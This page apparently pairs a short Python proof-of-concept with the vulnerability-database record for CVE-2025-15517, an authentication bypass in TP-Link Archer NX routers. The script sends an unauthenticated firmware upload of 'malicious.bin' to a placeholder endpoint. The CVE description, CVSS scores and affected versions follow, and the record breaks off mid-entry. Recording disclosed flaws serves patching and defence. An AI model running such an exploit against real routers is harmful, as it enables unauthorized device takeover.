CVE-2025-15517

import requests # Exploit Title: TP-Link Archer NX Series Auth Bypass (CVE-2025-15517) # Description: Uploads a malicious firmware file without authentication. # Target configuration target_ip = "192.168.0.1" # Replace with the router's IP address endpoint = "/cgi-bin/upload_firmware" # Vulnerable endpoint placeholder url = f"http://{target_ip}{endpoint}" # Prepare the malicious firmware file files = {'firmware': ('malicious.bin', open('malicious.bin', 'rb'), 'application/octet-stream')} try: # Send POST request without authentication headers print(f"[*] Sending exploit payload to {url}...") response = requests.post(url, files=files, timeout=10) # Check response if response.status_code == 200: print("[+] Exploit successful! Firmware uploaded.") else: print(f"[-] Exploit failed. Server returned: {response.status_code}") print(response.text) except Exception as e: print(f"[!] An error occurred: {e}")

{"cve": {"id": "CVE-2025-15517", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-03-23T18:16:22.347", "lastModified": "2026-03-31T19:08:33.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A missing authentication check in the HTTP server on TP-Link Archer NX200, NX210, NX500 and NX600 to certain cgi endpoints allows unauthenticated access intended for authenticated users. An attacker may perform privileged HTTP actions without authentication, including firmware upload and configuration operations."}, {"lang": "es", "value": "Una comprobación de autenticación faltante en el servidor HTTP en TP-Link Archer NX200, NX210, NX500 y NX600 a ciertos puntos finales cgi permite acceso no autenticado destinado a usuarios autenticados. Un atacante puede realizar acciones HTTP privilegiadas sin autenticación, incluyendo la carga de firmware y operaciones de configuración."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx600_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "77429691-1193-4480-A64E-E1FB19D6A073"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_nx600:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "58132EDD-47B7-4E46-B280-FE58A920AE43"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.0", "matchCriteriaId": "70EF52E9-1D92-4778-99C5-3B76B81681FA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_nx500:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "40D78DBB-CAEA-4C2E-B703-2898B73A0A5E"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx210_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "22EA51B1-332E-48BB-BDBA-09A99ECB942F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_nx210:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "DA336E76-7910-4780-BCA0-1DA2AA7F9418"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx200_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "48125D02-70B1-4448-BB33-4759FF0E3936"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_nx200:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "BD6E8279-6E92-47B5-9EE ... (truncated)